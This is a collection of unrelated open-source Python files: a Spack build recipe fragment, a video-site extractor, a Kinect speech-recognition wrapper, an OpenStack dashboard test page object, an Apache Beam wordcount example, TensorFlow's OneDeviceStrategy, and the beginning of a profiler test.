'LIBRARY_LOCATIONS += {0}\n'.format(spec[lib].prefix.lib)
)
contents.insert(
line_offset + count + 1,
'INCLUDE_LOCATIONS += {0}\n'.format(spec[lib].prefix.include)
)
count += 1
# Write GNUmakefile
with open('GNUmakefile', 'w') as file:
file.writelines(contents)
def setup_build_environment(self, env):
# We don't want an AMREX_HOME the user may have set already
env.unset('AMREX_HOME')
# Help force Amrvis to not pick up random system compilers
if '+mpi' in self.spec:
env.set('MPI_HOME', self.spec['mpi'].prefix)
env.set('CC', self.spec['mpi'].mpicc)
env.set('CXX', self.spec['mpi'].mpicxx)
env.set('F77', self.spec['mpi'].mpif77)
env.set('FC', self.spec['mpi'].mpifc)
def install(self, spec, prefix):
# Install exe manually
mkdirp(prefix.bin)
install('*.ex', prefix.bin)
|
import re
from .common import InfoExtractor
class TrailerAddictIE(InfoExtractor):
_VALID_URL = r'(?:http://)?(?:www\.)?traileraddict\.com/(?:trailer|clip)/(?P<movie>.+?)/(?P<trailer_name>.+)'
_TEST = {
u'url': u'http://www.traileraddict.com/trailer/prince-avalanche/trailer',
u'file': u'76184.mp4',
u'md5': u'57e39dbcf4142ceb8e1f242ff423fd71',
u'info_dict': {
u"title": u"Prince Avalanche Trailer",
u"description": u"Trailer for Prince Avalanche.Two highway road workers spend the summer of 1988 away from their city lives. The isolated landscape becomes a place of misadventure as the men find themselves at odds with each other and the women they left behind."
}
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
name = mobj.group('movie') + '/' + mobj.group('trailer_name')
webpage = self._download_webpage(url, name)
title = self._search_regex(r'<title>(.+?)</title>',
webpage, 'video title').replace(' - Trailer Addict','')
view_count = self._search_regex(r'Views: (.+?)<br />',
webpage, 'Views Count')
video_id = self._og_search_property('video', webpage, 'Video id').split('=')[1]
# Presence of (no)watchplus function indicates HD quality is available
if re.search(r'function (no)?watchplus()', webpage):
fvar = "fvarhd"
else:
fvar = "fvar"
info_url = "http://www.traileraddict.com/%s.php?tid=%s" % (fvar, str(video_id))
info_webpage = self._download_webpage(info_url, video_id , "Downloading the info webpage")
final_url = self._search_regex(r'&fileurl=(.+)',
info_webpage, 'Download url').replace('%3F','?')
thumbnail_url = self._search_regex(r'&image=(.+?)&',
info_webpage, 'thumbnail url')
ext = final_url.split('.')[-1].split('?')[0]
return [{
'id' : video_id,
'url' : final_url,
'ext' : ext,
'title' : title,
'thumbnail' : thumbnail_url,
'description' : self._og_search_description(webpage),
'view_count' : view_count,
}]
|
import os
import ctypes
from os import path
_audio_path = path.join(path.dirname(__file__), '..', 'pykinect', 'audio', 'PyKinectAudio.dll')
if not os.path.exists(_audio_path):
_audio_path = path.join(path.dirname(__file__), '..', '..', '..', '..', '..', '..', 'Binaries', 'Debug', 'PyKinectAudio.dll')
if not path.exists(_audio_path):
raise Exception('Cannot find PyKinectAudio.dll')
_PYAUDIODLL = ctypes.CDLL(_audio_path)
_CreateRecognizer = _PYAUDIODLL.CreateRecognizer
_CreateRecognizer.argtypes = [ctypes.c_voidp, ctypes.POINTER(ctypes.c_voidp)]
_CreateRecognizer.restype = ctypes.HRESULT
_SetInputFile = _PYAUDIODLL.SetInputFile
_SetInputFile.argtypes = [ctypes.c_voidp, ctypes.c_voidp]
_SetInputFile.restype = ctypes.HRESULT
_SetInputStream = _PYAUDIODLL.SetInputStream
_SetInputStream.argtypes = [ctypes.c_voidp, ctypes.c_voidp]
_SetInputStream.restype = ctypes.HRESULT
_IUnknownRelease = _PYAUDIODLL.IUnknownRelease
_IUnknownRelease.argtypes = [ctypes.c_voidp]
_IUnknownRelease.restype = None
_LoadGrammar = _PYAUDIODLL.LoadGrammar
_LoadGrammar.argtypes = [ctypes.c_wchar_p, ctypes.c_voidp, ctypes.POINTER(ctypes.c_voidp)]
_LoadGrammar.restype = ctypes.HRESULT
_EnumRecognizers = _PYAUDIODLL.EnumRecognizers
_ReadCallback = ctypes.WINFUNCTYPE(ctypes.HRESULT, ctypes.c_uint32, ctypes.c_voidp, ctypes.POINTER(ctypes.c_uint32))
_Recognize_Callback = ctypes.WINFUNCTYPE(None, ctypes.c_wchar_p)
_RecognizeOne = _PYAUDIODLL.RecognizeOne
_RecognizeOne.argtypes = [ctypes.c_voidp, ctypes.c_uint32, _Recognize_Callback, _Recognize_Callback]
_RecognizeOne.restype = ctypes.HRESULT
_RecognizeAsync = _PYAUDIODLL.RecognizeAsync
_RecognizeAsync.argtypes = [ctypes.c_voidp, ctypes.c_uint, _Recognize_Callback, _Recognize_Callback, ctypes.POINTER(ctypes.c_voidp)]
_RecognizeAsync.restype = ctypes.HRESULT
_StopRecognizeAsync = _PYAUDIODLL.StopRecognizeAsync
_StopRecognizeAsync.argtypes = [ctypes.c_voidp]
_StopRecognizeAsync.restype = ctypes.HRESULT
_EnumRecognizersCallback = ctypes.WINFUNCTYPE(None, ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.c_voidp)
class Grammar(object):
"""Represents a speech grammar constructed from an XML file"""
def __init__(self, filename):
self.filename = filename
def __del__(self):
#_IUnknownRelease(self._reco_ctx)
_IUnknownRelease(self._grammar)
class RecognizerInfo(object):
def __init__(self, id, description, token):
self.id = id
self.description = description
self._token = token
def __del__(self):
_IUnknownRelease(self._token)
def __repr__(self):
return 'RecognizerInfo(%r, %r, ...)' % (self.id, self.description)
class RecognitionResult(object):
def __init__(self, text, alternates = None):
self.text = text
if alternates:
self.alternates = tuple(RecognitionResult(alt) for alt in alternates)
else:
self.alternates = ()
class _event(object):
"""class used for adding/removing/invoking a set of listener functions"""
__slots__ = ['handlers']
def __init__(self):
self.handlers = []
def __iadd__(self, other):
self.handlers.append(other)
return self
def __isub__(self, other):
self.handlers.remove(other)
return self
def fire(self, *args):
for handler in self.handlers:
handler(*args)
class RecognitionEventArgs(object):
"""Provides information about speech recognition events."""
def __init__(self, result):
self.result = result
class SpeechRecognitionEngine(object):
"""Provides the means to access and manage an in-process speech recognition engine."""
def __init__(self, recognizer = None):
self.speech_recognized = _event()
self._async_handle = None
if isinstance(recognizer, str):
# TODO: Lookup by ID
pass
elif isinstance(recognizer, RecognizerInfo):
rec = ctypes.c_voidp()
_CreateRecognizer(recognizer._token, ctypes.byref(rec))
self._rec = rec
elif recognizer is None:
rec = ctypes.c_voidp()
_CreateRecognizer(None, ctypes.byref(rec))
self._rec = rec
else:
raise TypeError('Bad type for recognizer: ' + repr(recognizer))
def __del__(self):
# TODO: Need to shut down any listening threads
self.recognize_async_stop()
_IUnknownRelease(self._rec)
def load_grammar(self, grammar):
if isinstance(grammar, str):
grammar_obj = Grammar(grammar)
else:
grammar_obj = grammar
comGrammar = ctypes.c_voidp()
_LoadGrammar(grammar_obj.filename, self._rec, ctypes.byref(comGrammar))
grammar_obj._grammar = comGrammar
return grammar_obj
def set_input_to_audio_file(self, stream):
"""sets the input to a Python file-like object which implements read"""
stream_obj = getattr(stream, '__ISpStreamFormat__', None)
if stream_obj is not None:
# optimization: we can avoid going through Python to do the reading by passing
# the original ISpStreamFormat object through
_SetInputStream(self._rec, stream_obj)
else:
def reader(byteCount, buffer, bytesRead):
bytes = stream.read(byteCount)
ctypes.memmove(buffer, bytes, len(bytes))
bytesRead.contents.value = len(bytes)
return 0
self._reader = _ReadCallback(reader)
_SetInputFile(self._rec, self._reader)
def recognize_sync(self, timeout = 30000):
"""attempts to recognize speech and returns the recognized text.
By default times out after 30 seconds"""
res = []
alts = []
def callback(text):
res.append(text)
def alt_callback(text):
if text is not None:
alts.append(text)
_RecognizeOne(self._rec, timeout, _Recognize_Callback(callback), _Recognize_Callback(alt_callback))
if res:
return RecognitionResult(res[0], alts)
return None
def recognize_async(self, multiple = False):
cur_result = []
def callback(text):
cur_result.append(text)
def alt_callback(text):
if text == None:
# send the event
result = RecognitionResult(cur_result[0], cur_result[1:])
event_args = RecognitionEventArgs(result)
self.speech_recognized.fire(event_args)
del cur_result[:]
else:
cur_result.append(text)
stop_listening_handle = ctypes.c_voidp()
# keep alive our function pointers on ourselves...
self._async_callback = async_callback =_Recognize_Callback(callback)
self._async_alt_callback = async_alt_callback = _Recognize_Callback(alt_callback)
_RecognizeAsync(self._rec, multiple, async_callback, async_alt_callback, ctypes.byref(stop_listening_handle))
self._async_handle = stop_listening_handle
def recognize_async_stop(self):
if self._async_handle is not None:
_StopRecognizeAsync(self._async_handle)
self._async_handle = None
@staticmethod
def installed_recognizers():
ids = []
def callback(id, description, token):
ids.append(RecognizerInfo(id, description, token))
_EnumRecognizers(_EnumRecognizersCallback(callback))
return ids
|
from selenium.webdriver.common import by
from openstack_dashboard.test.integration_tests.pages import basepage
from openstack_dashboard.test.integration_tests.pages.project.compute.volumes.\
volumespage import VolumesPage
from openstack_dashboard.test.integration_tests.regions import forms
from openstack_dashboard.test.integration_tests.regions import tables
class VolumesnapshotsTable(tables.TableRegion):
name = 'volume_snapshots'
marker_name = 'snapshot_marker'
prev_marker_name = 'prev_snapshot_marker'
EDIT_SNAPSHOT_FORM_FIELDS = ("name", "description")
CREATE_VOLUME_FORM_FIELDS = (
"name", "description", "snapshot_source", "type", "size")
@tables.bind_table_action('delete')
def delete_volume_snapshots(self, delete_button):
"""Batch Delete table action."""
delete_button.click()
return forms.BaseFormRegion(self.driver, self.conf)
@tables.bind_row_action('delete')
def delete_volume_snapshot(self, delete_button, row):
"""Per-entity delete row action."""
delete_button.click()
return forms.BaseFormRegion(self.driver, self.conf)
@tables.bind_row_action('edit')
def edit_snapshot(self, edit_button, row):
edit_button.click()
return forms.FormRegion(self.driver, self.conf,
field_mappings=self.EDIT_SNAPSHOT_FORM_FIELDS)
@tables.bind_row_action('create_from_snapshot')
def create_volume(self, create_volume_button, row):
create_volume_button.click()
return forms.FormRegion(self.driver, self.conf,
field_mappings=self.CREATE_VOLUME_FORM_FIELDS)
class VolumesnapshotsPage(basepage.BaseNavigationPage):
SNAPSHOT_TABLE_NAME_COLUMN = 'name'
SNAPSHOT_TABLE_STATUS_COLUMN = 'status'
SNAPSHOT_TABLE_VOLUME_NAME_COLUMN = 'volume_name'
_volumes_tab_locator = (
by.By.CSS_SELECTOR,
'a[href*="tab=volumes_and_snapshots__volumes_tab"]')
def __init__(self, driver, conf):
super(VolumesnapshotsPage, self).__init__(driver, conf)
self._page_title = "Volumes"
@property
def volumesnapshots_table(self):
return VolumesnapshotsTable(self.driver, self.conf)
def switch_to_volumes_tab(self):
self._get_element(*self._volumes_tab_locator).click()
return VolumesPage(self.driver, self.conf)
def _get_row_with_volume_snapshot_name(self, name):
return self.volumesnapshots_table.get_row(
self.SNAPSHOT_TABLE_NAME_COLUMN,
name)
def is_snapshot_present(self, name):
return bool(self._get_row_with_volume_snapshot_name(name))
def delete_volume_snapshot(self, name):
row = self._get_row_with_volume_snapshot_name(name)
confirm_form = self.volumesnapshots_table.delete_volume_snapshot(row)
confirm_form.submit()
def delete_volume_snapshots(self, names):
for name in names:
row = self._get_row_with_volume_snapshot_name(name)
row.mark()
confirm_form = self.volumesnapshots_table.delete_volume_snapshots()
confirm_form.submit()
def is_volume_snapshot_deleted(self, name):
return self.volumesnapshots_table.is_row_deleted(
lambda: self._get_row_with_volume_snapshot_name(name))
def is_volume_snapshot_available(self, name):
def cell_getter():
row = self._get_row_with_volume_snapshot_name(name)
return row and row.cells[self.SNAPSHOT_TABLE_STATUS_COLUMN]
return bool(self.volumesnapshots_table.wait_cell_status(cell_getter,
'Available'))
def get_volume_name(self, snapshot_name):
row = self._get_row_with_volume_snapshot_name(snapshot_name)
return row.cells[self.SNAPSHOT_TABLE_VOLUME_NAME_COLUMN].text
def edit_snapshot(self, name, new_name=None, description=None):
row = self._get_row_with_volume_snapshot_name(name)
snapshot_edit_form = self.volumesnapshots_table.edit_snapshot(row)
if new_name:
snapshot_edit_form.name.text = new_name
if description:
snapshot_edit_form.description.text = description
snapshot_edit_form.submit()
def create_volume_from_snapshot(self, snapshot_name, volume_name=None,
description=None, volume_size=None):
row = self._get_row_with_volume_snapshot_name(snapshot_name)
volume_form = self.volumesnapshots_table.create_volume(row)
if volume_name:
volume_form.name.text = volume_name
if description:
volume_form.description.text = description
if volume_size is None:
volume_size = self.conf.volume.volume_size
volume_form.size.value = volume_size
volume_form.submit()
|
"""An example that verifies the counts and includes best practices.
On top of the basic concepts in the wordcount example, this workflow introduces
logging to Cloud Logging, and using assertions in a Dataflow pipeline.
To execute this pipeline locally, specify a local output file or output prefix
on GCS::
--output [YOUR_LOCAL_FILE | gs://YOUR_OUTPUT_PREFIX]
To execute this pipeline using the Google Cloud Dataflow service, specify
pipeline configuration::
--project YOUR_PROJECT_ID
--staging_location gs://YOUR_STAGING_DIRECTORY
--temp_location gs://YOUR_TEMP_DIRECTORY
--job_name YOUR_JOB_NAME
--runner DataflowRunner
and an output prefix on GCS::
--output gs://YOUR_OUTPUT_PREFIX
"""
from __future__ import absolute_import
import argparse
import logging
import re
from past.builtins import unicode
import apache_beam as beam
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.metrics import Metrics
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.testing.util import assert_that
from apache_beam.testing.util import equal_to
class FilterTextFn(beam.DoFn):
"""A DoFn that filters for a specific key based on a regular expression."""
def __init__(self, pattern):
super(FilterTextFn, self).__init__()
self.pattern = pattern
# A custom metric can track values in your pipeline as it runs. Those
# values will be available in the monitoring system of the runner used
# to run the pipeline. These metrics below track the number of
# matched and unmatched words.
self.matched_words = Metrics.counter(self.__class__, 'matched_words')
self.umatched_words = Metrics.counter(self.__class__, 'umatched_words')
def process(self, element):
word, _ = element
if re.match(self.pattern, word):
# Log at INFO level each element we match. When executing this pipeline
# using the Dataflow service, these log lines will appear in the Cloud
# Logging UI.
logging.info('Matched %s', word)
self.matched_words.inc()
yield element
else:
# Log at the "DEBUG" level each element that is not matched. Different log
# levels can be used to control the verbosity of logging providing an
# effective mechanism to filter less important information.
# Note currently only "INFO" and higher level logs are emitted to the
# Cloud Logger. This log message will not be visible in the Cloud Logger.
logging.debug('Did not match %s', word)
self.umatched_words.inc()
class CountWords(beam.PTransform):
"""A transform to count the occurrences of each word.
A PTransform that converts a PCollection containing lines of text into a
PCollection of (word, count) tuples.
"""
def expand(self, pcoll):
def count_ones(word_ones):
(word, ones) = word_ones
return (word, sum(ones))
return (pcoll
| 'split' >> (beam.FlatMap(lambda x: re.findall(r'[A-Za-z\']+', x))
.with_output_types(unicode))
| 'pair_with_one' >> beam.Map(lambda x: (x, 1))
| 'group' >> beam.GroupByKey()
| 'count' >> beam.Map(count_ones))
def run(argv=None):
"""Runs the debugging wordcount pipeline."""
parser = argparse.ArgumentParser()
parser.add_argument('--input',
dest='input',
default='gs://dataflow-samples/shakespeare/kinglear.txt',
help='Input file to process.')
parser.add_argument('--output',
dest='output',
required=True,
help='Output file to write results to.')
known_args, pipeline_args = parser.parse_known_args(argv)
# We use the save_main_session option because one or more DoFn's in this
# workflow rely on global context (e.g., a module imported at module level).
pipeline_options = PipelineOptions(pipeline_args)
pipeline_options.view_as(SetupOptions).save_main_session = True
with beam.Pipeline(options=pipeline_options) as p:
# Read the text file[pattern] into a PCollection, count the occurrences of
# each word and filter by a list of words.
filtered_words = (
p | 'read' >> ReadFromText(known_args.input)
| CountWords()
| 'FilterText' >> beam.ParDo(FilterTextFn('Flourish|stomach')))
# assert_that is a convenient PTransform that checks a PCollection has an
# expected value. Asserts are best used in unit tests with small data sets
# but is demonstrated here as a teaching tool.
#
# Note assert_that does not provide any output and that successful
# completion of the Pipeline implies that the expectations were met. Learn
# more at https://cloud.google.com/dataflow/pipelines/testing-your-pipeline
# on how to best test your pipeline.
assert_that(
filtered_words, equal_to([('Flourish', 3), ('stomach', 1)]))
# Format the counts into a PCollection of strings and write the output using
# a "Write" transform that has side effects.
# pylint: disable=unused-variable
def format_result(word_count):
(word, count) = word_count
return '%s: %s' % (word, count)
output = (filtered_words
| 'format' >> beam.Map(format_result)
| 'write' >> WriteToText(known_args.output))
if __name__ == '__main__':
# Cloud Logging would contain only logging.INFO and higher level logs logged
# by the root logger. All log statements emitted by the root logger will be
# visible in the Cloud Logging UI. Learn more at
# https://cloud.google.com/logging about the Cloud Logging UI.
#
# You can set the default logging level to a different level when running
# locally.
logging.getLogger().setLevel(logging.INFO)
run()
|
"""A tf.distribute.Strategy for running on a single device."""
from tensorflow.python.distribute import device_util
from tensorflow.python.distribute import distribute_lib
from tensorflow.python.distribute import distribute_utils
from tensorflow.python.distribute import input_lib
from tensorflow.python.distribute import input_util
from tensorflow.python.distribute import numpy_dataset
from tensorflow.python.distribute.v1 import input_lib as input_lib_v1
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.util import nest
from tensorflow.python.util.tf_export import tf_export
@tf_export("distribute.OneDeviceStrategy", v1=[])
class OneDeviceStrategy(distribute_lib.Strategy):
"""A distribution strategy for running on a single device.
Using this strategy will place any variables created in its scope on the
specified device. Input distributed through this strategy will be
prefetched to the specified device. Moreover, any functions called via
`strategy.run` will also be placed on the specified device
as well.
Typical usage of this strategy could be testing your code with the
tf.distribute.Strategy API before switching to other strategies which
actually distribute to multiple devices/machines.
For example:
```
strategy = tf.distribute.OneDeviceStrategy(device="/gpu:0")
with strategy.scope():
v = tf.Variable(1.0)
print(v.device) # /job:localhost/replica:0/task:0/device:GPU:0
def step_fn(x):
return x * 2
result = 0
for i in range(10):
result += strategy.run(step_fn, args=(i,))
print(result) # 90
```
"""
def __init__(self, device):
"""Creates a `OneDeviceStrategy`.
Args:
device: Device string identifier for the device on which the variables
should be placed. See class docs for more details on how the device is
used. Examples: "/cpu:0", "/gpu:0", "/device:CPU:0", "/device:GPU:0"
"""
super(OneDeviceStrategy, self).__init__(OneDeviceExtended(self, device))
distribute_lib.distribution_strategy_gauge.get_cell("V2").set(
"OneDeviceStrategy")
def experimental_distribute_dataset(self, dataset, options=None): # pylint: disable=useless-super-delegation
"""Distributes a tf.data.Dataset instance provided via dataset.
In this case, there is only one device, so this is only a thin wrapper
around the input dataset. It will, however, prefetch the input data to the
specified device. The returned distributed dataset can be iterated over
similar to how regular datasets can.
NOTE: Currently, the user cannot add any more transformations to a
distributed dataset.
Example:
```
strategy = tf.distribute.OneDeviceStrategy()
dataset = tf.data.Dataset.range(10).batch(2)
dist_dataset = strategy.experimental_distribute_dataset(dataset)
for x in dist_dataset:
print(x) # [0, 1], [2, 3],...
```
Args:
dataset: `tf.data.Dataset` to be prefetched to device.
options: `tf.distribute.InputOptions` used to control options on how this
dataset is distributed.
Returns:
A "distributed `Dataset`" that the caller can iterate over.
"""
return super(OneDeviceStrategy, self).experimental_distribute_dataset(
dataset, options)
def distribute_datasets_from_function(
self,
dataset_fn, # pylint: disable=useless-super-delegation
options=None):
"""Distributes `tf.data.Dataset` instances created by calls to `dataset_fn`.
`dataset_fn` will be called once for each worker in the strategy. In this
case, we only have one worker and one device so `dataset_fn` is called
once.
The `dataset_fn` should take an `tf.distribute.InputContext` instance where
information about batching and input replication can be accessed:
```
def dataset_fn(input_context):
batch_size = input_context.get_per_replica_batch_size(global_batch_size)
d = tf.data.Dataset.from_tensors([[1.]]).repeat().batch(batch_size)
return d.shard(
input_context.num_input_pipelines, input_context.input_pipeline_id)
inputs = strategy.distribute_datasets_from_function(dataset_fn)
for batch in inputs:
replica_results = strategy.run(replica_fn, args=(batch,))
```
IMPORTANT: The `tf.data.Dataset` returned by `dataset_fn` should have a
per-replica batch size, unlike `experimental_distribute_dataset`, which uses
the global batch size. This may be computed using
`input_context.get_per_replica_batch_size`.
Args:
dataset_fn: A function taking a `tf.distribute.InputContext` instance and
returning a `tf.data.Dataset`.
options: `tf.distribute.InputOptions` used to control options on how this
dataset is distributed.
Returns:
A "distributed `Dataset`", which the caller can iterate over like regular
datasets.
"""
return super(OneDeviceStrategy,
self).distribute_datasets_from_function(dataset_fn, options)
def experimental_local_results(self, value): # pylint: disable=useless-super-delegation
"""Returns the list of all local per-replica values contained in `value`.
In `OneDeviceStrategy`, the `value` is always expected to be a single
value, so the result is just the value in a tuple.
Args:
value: A value returned by `experimental_run()`, `run()`,
`extended.call_for_each_replica()`, or a variable created in `scope`.
Returns:
A tuple of values contained in `value`. If `value` represents a single
value, this returns `(value,).`
"""
return super(OneDeviceStrategy, self).experimental_local_results(value)
def run(self, fn, args=(), kwargs=None, options=None): # pylint: disable=useless-super-delegation
"""Run `fn` on each replica, with the given arguments.
In `OneDeviceStrategy`, `fn` is simply called within a device scope for the
given device, with the provided arguments.
Args:
fn: The function to run. The output must be a `tf.nest` of `Tensor`s.
args: (Optional) Positional arguments to `fn`.
kwargs: (Optional) Keyword arguments to `fn`.
options: (Optional) An instance of `tf.distribute.RunOptions` specifying
the options to run `fn`.
Returns:
Return value from running `fn`.
"""
return super(OneDeviceStrategy, self).run(fn, args, kwargs, options)
def reduce(self, reduce_op, value, axis): # pylint: disable=useless-super-delegation
"""Reduce `value` across replicas.
In `OneDeviceStrategy`, there is only one replica, so if axis=None, value
is simply returned. If axis is specified as something other than None,
such as axis=0, value is reduced along that axis and returned.
Example:
```
t = tf.range(10)
result = strategy.reduce(tf.distribute.ReduceOp.SUM, t, axis=None).numpy()
# result: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
result = strategy.reduce(tf.distribute.ReduceOp.SUM, t, axis=0).numpy()
# result: 45
```
Args:
reduce_op: A `tf.distribute.ReduceOp` value specifying how values should
be combined.
value: A "per replica" value, e.g. returned by `run` to
be combined into a single tensor.
axis: Specifies the dimension to reduce along within each
replica's tensor. Should typically be set to the batch dimension, or
`None` to only reduce across replicas (e.g. if the tensor has no batch
dimension).
Returns:
A `Tensor`.
"""
return super(OneDeviceStrategy, self).reduce(reduce_op, value, axis)
def scope(self): # pylint: disable=useless-super-delegation
"""Returns a context manager selecting this Strategy as current.
Inside a `with strategy.scope():` code block, this thread
will use a variable creator set by `strategy`, and will
enter its "cross-replica context".
In `OneDeviceStrategy`, all variables created inside `strategy.scope()`
will be on `device` specified at strategy construction time.
See example in the docs for this class.
Returns:
A context manager to use for creating variables with this strategy.
"""
return super(OneDeviceStrategy, self).scope()
@tf_export(v1=["distribute.OneDeviceStrategy"]) # pylint: disable=empty-docstring
class OneDeviceStrategyV1(distribute_lib.StrategyV1):
__doc__ = OneDeviceStrategy.__doc__.replace(
"For example:\n ```",
"For example:\n ```\n tf.enable_eager_execution()")
def __init__(self, device):
super(OneDeviceStrategyV1, self).__init__(OneDeviceExtended(self, device))
distribute_lib.distribution_strategy_gauge.get_cell("V1").set(
"OneDeviceStrategy")
__init__.__doc__ = OneDeviceStrategy.__init__.__doc__
class OneDeviceExtended(distribute_lib.StrategyExtendedV1):
"""Implementation of OneDeviceStrategy."""
def __init__(self, container_strategy, device):
super(OneDeviceExtended, self).__init__(container_strategy)
self._device = device_util.resolve(device)
self._input_device = device_util.get_host_for_device(self._device)
def _input_workers_with_options(self, options=None):
if not options or options.experimental_fetch_to_device:
return input_lib.InputWorkers([(self._input_device, (self._device,))])
else:
return input_lib.InputWorkers([(self._input_device,
(self._input_device,))])
@property
def _input_workers(self):
return self._input_workers_with_options()
def _create_variable(self, next_creator, **kwargs):
colocate_with = kwargs.pop("colocate_with", None)
if colocate_with is None:
with ops.device(self._device):
return next_creator(**kwargs)
elif isinstance(colocate_with, numpy_dataset.SingleDevice):
with ops.device(colocate_with.device):
return next_creator(**kwargs)
else:
with ops.colocate_with(colocate_with):
return next_creator(**kwargs)
def _validate_colocate_with_variable(self, colocate_with_variable):
distribute_utils.validate_colocate(colocate_with_variable, self)
def _make_dataset_iterator(self, dataset):
"""Make iterator from dataset without splitting the batch."""
# Note that split_batch_by argument is not passed because it is always 1 in
# this strategy, and adding it adds unnecessary overhead to the dataset.
return input_lib_v1.DatasetIterator(dataset, self._input_workers,
self._container_strategy())
def _make_input_fn_iterator(
self,
input_fn,
replication_mode=distribute_lib.InputReplicationMode.PER_WORKER):
return input_lib_v1.InputFunctionIterator(input_fn, self._input_workers,
[distribute_lib.InputContext()],
self._container_strategy())
def _experimental_make_numpy_dataset(self, numpy_input, session):
return numpy_dataset.one_host_numpy_dataset(
numpy_input, numpy_dataset.SingleDevice(self._input_device), session)
def _broadcast_to(self, tensor, destinations):
del destinations
return tensor
def _experimental_distribute_dataset(self, dataset, options):
# Note that split_batch_by argument is not passed because it is always 1 in
# this strategy, and adding it adds unnecessary overhead to the dataset.
if (options and options.experimental_replication_mode ==
distribute_lib.InputReplicationMode.PER_REPLICA):
raise NotImplementedError(
"InputReplicationMode.PER_REPLICA "
"is only supported in "
"`experimental_distribute_datasets_from_function`."
)
return input_util.get_distributed_dataset(
dataset,
self._input_workers_with_options(options),
self._container_strategy(),
options=options)
def _distribute_datasets_from_function(self, dataset_fn, options):
if (options and options.experimental_replication_mode ==
distribute_lib.InputReplicationMode.PER_REPLICA):
raise NotImplementedError(
"InputReplicationMode.PER_REPLICA "
"is only supported in "
"`experimental_distribute_datasets_from_function` "
"of tf.distribute.MirroredStrategy")
return input_util.get_distributed_datasets_from_function(
dataset_fn,
self._input_workers_with_options(options),
[distribute_lib.InputContext()],
self._container_strategy(),
options=options)
def _experimental_distribute_values_from_function(self, value_fn):
# TODO(b/137795644): This should return a PerReplica value but other
# methods like run in OneDeviceStrategy need to be modified
# to do the same.
return value_fn(distribute_lib.ValueContext())
# TODO(priyag): Deal with OutOfRange errors once b/111349762 is fixed.
def _experimental_run_steps_on_iterator(self, fn, iterator, iterations,
initial_loop_values=None):
if initial_loop_values is None:
initial_loop_values = {}
initial_loop_values = nest.flatten(initial_loop_values)
ctx = input_lib.MultiStepContext()
def body(i, *args):
"""A wrapper around `fn` to create the while loop body."""
del args
fn_result = fn(ctx, iterator.get_next())
flat_last_step_outputs = nest.flatten(ctx.last_step_outputs)
with ops.control_dependencies([fn_result]):
return [i + 1] + flat_last_step_outputs
# We capture the control_flow_context at this point, before we run `fn`
# inside a while_loop. This is useful in cases where we might need to exit
# these contexts and get back to the outer context to do some things, for
# e.g. create an op which should be evaluated only once at the end of the
# loop on the host. One such usage is in creating metrics' value op.
self._outer_control_flow_context = (
ops.get_default_graph()._get_control_flow_context()) # pylint: disable=protected-access
# TODO(priyag): Use max_iterations instead of an explicit counter.
cond = lambda i, *args: i < iterations
i = constant_op.constant(0)
loop_result = control_flow_ops.while_loop(
cond, body, [i] + initial_loop_values, name="",
parallel_iterations=1, back_prop=False, swap_memory=False,
return_same_structure=True)
del self._outer_control_flow_context
ctx.run_op = control_flow_ops.group(loop_result)
# Convert the last_step_outputs from a list to the original dict structure
# of last_step_outputs.
last_step_tensor_outputs = loop_result[1:]
last_step_tensor_outputs_dict = nest.pack_sequence_as(
ctx.last_step_outputs, last_step_tensor_outputs)
ctx._set_last_step_outputs(last_step_tensor_outputs_dict) # pylint: disable=protected-access
return ctx
def _call_for_each_replica(self, fn, args, kwargs):
strategy = self._container_strategy()
with ops.device(self._device), _OneDeviceReplicaContext(strategy):
return fn(*args, **kwargs)
def _reduce_to(self, reduce_op, value, destinations, options):
del reduce_op, destinations, options
return value
def _gather_to_implementation(self, value, destinations, axis, options):
del destinations, axis, options
return value
def _update(self, var, fn, args, kwargs, group):
# The implementations of _update() and _update_non_slot() are identical
# except _update() passes `var` as the first argument to `fn()`.
return self._update_non_slot(var, fn, (var,) + tuple(args), kwargs, group)
def _update_non_slot(self, colocate_with, fn, args, kwargs, group):
del colocate_with
with ops.device(self._device), distribute_lib.UpdateContext(self._device):
result = fn(*args, **kwargs)
if group:
return result
else:
return nest.map_structure(self._local_results, result)
def read_var(self, replica_local_var):
"""Read the aggregate value of a replica-local variable."""
return array_ops.identity(replica_local_var)
def _local_results(self, value):
return (value,)
def value_container(self, value):
return value
def _in_multi_worker_mode(self):
"""Whether this strategy indicates working in multi-worker settings."""
return False
@property
def _num_replicas_in_sync(self):
return 1
@property
def worker_devices(self):
return (self._device,)
@property
def parameter_devices(self):
return (self._device,)
def non_slot_devices(self, var_list):
del var_list
return (self._device,)
@property
def experimental_should_init(self):
return True
@property
def experimental_between_graph(self):
return False
@property
def should_checkpoint(self):
return True
@property
def should_save_summary(self):
return True
# TODO(priyag): Delete this once all strategies use global batch size.
@property
def _global_batch_size(self):
"""Global and per-replica batching are equivalent for OneDeviceStrategy."""
return True
@property
def _support_per_replica_values(self):
return False
def _get_local_replica_id(self, replica_id_in_sync_group):
return replica_id_in_sync_group
class _OneDeviceReplicaContext(distribute_lib.ReplicaContext):
"""ReplicaContext for OneDeviceStrategy."""
def __init__(self, strategy):
distribute_lib.ReplicaContext.__init__(
self, strategy, replica_id_in_sync_group=0)
@property
def devices(self):
return self._strategy.extended.worker_devices
|
"""Tests for pprof_profiler."""
import gzip
from proto import profile_pb2
from tensorflow.core.framework import step_stats_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
from tensorflow.python.profiler import pprof_profiler
class PprofProfilerTest(test.TestCase):
def testDataEmpty(self):
output_dir = test.get_temp_dir()
run_metadata = config_pb2.RunMetadata()
graph = test.mock.MagicMock()
graph.get_operations.return_value = []
profiles = pprof_profiler.get_profiles(graph, run_metadata)
self.assertEqual(0, len(profiles))
profile_files = pprof_profiler.profile(
graph, run_metadata, output_dir)
self.assertEqual(0, len(profile_files))
def testRunMetadataEmpty(self):
output_dir = test.get_temp_dir()
run_metadata = config_pb2.RunMetadata()
graph = test.mock.MagicMock()
op1 = test.mock.MagicMock()
op1.name = 'Add/123'
